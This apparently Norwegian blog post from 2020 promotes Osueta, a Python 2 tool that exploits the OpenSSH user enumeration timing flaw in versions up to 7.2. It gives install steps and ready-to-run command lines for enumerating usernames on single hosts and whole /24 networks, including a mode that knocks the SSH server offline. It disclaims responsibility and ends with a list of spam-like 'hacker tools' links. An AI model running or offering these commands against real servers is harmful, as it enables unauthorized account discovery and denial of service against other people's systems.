mandag 13. april 2020

Osueta: A Simple Python Script To Exploit The OpenSSH User Enumeration Timing Attack


About Osueta?
   Osueta it's a simple Python 2 script to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH versions <= 7.2 and >= 5.*. The script has the ability to make variations of the username employed in the bruteforce attack, and the possibility to establish a DoS condition in the OpenSSH server.

    Read more: OpenSSH User Enumeration Time-Based Attack

   The bug was corrected in OpenSSH version 7.3.

   Authors of Osueta:

Osueta's Installation
   For Linux users, open your Terminal and enter these commands:
   If you're Windows users, follow these steps:
  • Install Python 2.7.x from Python.org first. On Install Python 2.7.x Setup, choose Add python.exe to Path.
  • Download Osueta-master zip file.
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install python-nmap paramiko IPy
    python osueta.py -h

Advice: Like others offensive tools, the authors disclaims all responsibility in the use of this script.

Osueta help menu:

Osueta's examples:
   A single user enumeration attempt with username variations:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes

   A single user enumeration attempt with no user variations a DoS attack:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes

   Scanning a C class network with only one user:
python2 osueta.py -H 192.168.1.0/24 -p 22 -U root -v no 

   Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:
python2 osueta.py -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50

Related articles


  1. Tools For Hacker
  2. Pentest Tools Nmap
  3. Hack Tools For Windows
  4. Hacker Tools 2019
  5. Hacker Tools Apk Download
  6. Hack Tools
  7. Hacking Tools Mac
  8. Hack Apps
  9. Hacker Tools Hardware
  10. Hacking App
  11. Tools For Hacker
  12. Hacker Tools Linux
  13. Hacker Tools Apk
  14. Hacker Tools Linux
  15. Pentest Tools Android
  16. Pentest Tools Download
  17. Hacking Tools
  18. Hacking Tools Windows 10
  19. Hacking Tools Windows
  20. Hacking Tools Pc
  21. Hack Tools Mac
  22. Pentest Tools Github
  23. Tools 4 Hack
  24. Hacking Tools For Pc
Lagt inn av kl.

Ingen kommentarer:

Legg inn en kommentar

Abonner på: Legg inn kommentarer (Atom)